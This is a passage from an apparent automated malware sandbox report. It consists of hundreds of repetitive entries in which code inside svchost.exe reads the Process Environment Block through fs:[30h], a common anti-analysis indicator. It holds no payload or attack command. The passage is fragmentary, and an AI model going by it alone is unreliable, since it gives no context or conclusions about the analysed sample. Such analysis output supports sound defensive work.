          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov ecx, dword ptr fs:[00000030h]2_2_034DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F0115 mov eax, dword ptr fs:[00000030h]2_2_034F0115
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460124 mov eax, dword ptr fs:[00000030h]2_2_03460124
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]2_2_034F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]2_2_034F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_034AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035061E5 mov eax, dword ptr fs:[00000030h]2_2_035061E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034601F8 mov eax, dword ptr fs:[00000030h]2_2_034601F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03470185 mov eax, dword ptr fs:[00000030h]2_2_03470185
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]2_2_034EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]2_2_034EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]2_2_034D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]2_2_034D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432050 mov eax, dword ptr fs:[00000030h]2_2_03432050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6050 mov eax, dword ptr fs:[00000030h]2_2_034B6050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345C073 mov eax, dword ptr fs:[00000030h]2_2_0345C073
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4000 mov ecx, dword ptr fs:[00000030h]2_2_034B4000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A020 mov eax, dword ptr fs:[00000030h]2_2_0342A020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C020 mov eax, dword ptr fs:[00000030h]2_2_0342C020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6030 mov eax, dword ptr fs:[00000030h]2_2_034C6030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B20DE mov eax, dword ptr fs:[00000030h]2_2_034B20DE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0342A0E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034380E9 mov eax, dword ptr fs:[00000030h]2_2_034380E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B60E0 mov eax, dword ptr fs:[00000030h]2_2_034B60E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C0F0 mov eax, dword ptr fs:[00000030h]2_2_0342C0F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034720F0 mov ecx, dword ptr fs:[00000030h]2_2_034720F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343208A mov eax, dword ptr fs:[00000030h]2_2_0343208A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034280A0 mov eax, dword ptr fs:[00000030h]2_2_034280A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C80A8 mov eax, dword ptr fs:[00000030h]2_2_034C80A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F60B8 mov eax, dword ptr fs:[00000030h]2_2_034F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F60B8 mov ecx, dword ptr fs:[00000030h]2_2_034F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov esi, dword ptr fs:[00000030h]2_2_0346674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]2_2_0346674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]2_2_0346674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430750 mov eax, dword ptr fs:[00000030h]2_2_03430750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE75D mov eax, dword ptr fs:[00000030h]2_2_034BE75D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]2_2_03472750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]2_2_03472750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4755 mov eax, dword ptr fs:[00000030h]2_2_034B4755
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438770 mov eax, dword ptr fs:[00000030h]2_2_03438770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C700 mov eax, dword ptr fs:[00000030h]2_2_0346C700
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430710 mov eax, dword ptr fs:[00000030h]2_2_03430710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460710 mov eax, dword ptr fs:[00000030h]2_2_03460710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]2_2_0346C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]2_2_0346C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]2_2_0346273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov ecx, dword ptr fs:[00000030h]2_2_0346273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]2_2_0346273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AC730 mov eax, dword ptr fs:[00000030h]2_2_034AC730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343C7C0 mov eax, dword ptr fs:[00000030h]2_2_0343C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B07C3 mov eax, dword ptr fs:[00000030h]2_2_034B07C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE7E1 mov eax, dword ptr fs:[00000030h]2_2_034BE7E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]2_2_034347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]2_2_034347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D678E mov eax, dword ptr fs:[00000030h]2_2_034D678E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034307AF mov eax, dword ptr fs:[00000030h]2_2_034307AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E47A0 mov eax, dword ptr fs:[00000030h]2_2_034E47A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344C640 mov eax, dword ptr fs:[00000030h]2_2_0344C640
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]2_2_034F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]2_2_034F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]2_2_0346A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]2_2_0346A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03462674 mov eax, dword ptr fs:[00000030h]2_2_03462674
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE609 mov eax, dword ptr fs:[00000030h]2_2_034AE609
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472619 mov eax, dword ptr fs:[00000030h]2_2_03472619
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E627 mov eax, dword ptr fs:[00000030h]2_2_0344E627
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03466620 mov eax, dword ptr fs:[00000030h]2_2_03466620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468620 mov eax, dword ptr fs:[00000030h]2_2_03468620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343262C mov eax, dword ptr fs:[00000030h]2_2_0343262C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0346A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A6C7 mov eax, dword ptr fs:[00000030h]2_2_0346A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]2_2_034B06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]2_2_034B06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]2_2_03434690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]2_2_03434690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C6A6 mov eax, dword ptr fs:[00000030h]2_2_0346C6A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034666B0 mov eax, dword ptr fs:[00000030h]2_2_034666B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]2_2_03438550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]2_2_03438550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6500 mov eax, dword ptr fs:[00000030h]2_2_034C6500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]2_2_0346E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]2_2_0346E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034365D0 mov eax, dword ptr fs:[00000030h]2_2_034365D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]2_2_0346A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]2_2_0346A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034325E0 mov eax, dword ptr fs:[00000030h]2_2_034325E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]2_2_0346C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]2_2_0346C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432582 mov eax, dword ptr fs:[00000030h]2_2_03432582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432582 mov ecx, dword ptr fs:[00000030h]2_2_03432582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03464588 mov eax, dword ptr fs:[00000030h]2_2_03464588
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E59C mov eax, dword ptr fs:[00000030h]2_2_0346E59C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]2_2_034B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]2_2_034B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]2_2_034B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]2_2_034545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]2_2_034545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA456 mov eax, dword ptr fs:[00000030h]2_2_034EA456
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342645D mov eax, dword ptr fs:[00000030h]2_2_0342645D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345245A mov eax, dword ptr fs:[00000030h]2_2_0345245A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC460 mov ecx, dword ptr fs:[00000030h]2_2_034BC460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]2_2_0345A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]2_2_0345A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]2_2_0345A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]2_2_03468402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]2_2_03468402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]2_2_03468402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]2_2_0342E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]2_2_0342E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]2_2_0342E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C427 mov eax, dword ptr fs:[00000030h]2_2_0342C427
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A430 mov eax, dword ptr fs:[00000030h]2_2_0346A430
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034304E5 mov ecx, dword ptr fs:[00000030h]2_2_034304E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA49A mov eax, dword ptr fs:[00000030h]2_2_034EA49A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034364AB mov eax, dword ptr fs:[00000030h]2_2_034364AB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034644B0 mov ecx, dword ptr fs:[00000030h]2_2_034644B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BA4B0 mov eax, dword ptr fs:[00000030h]2_2_034BA4B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h]2_2_034E4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h]2_2_034E4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]2_2_03502B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]2_2_03502B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]2_2_03502B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]2_2_03502B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]2_2_034C6B40
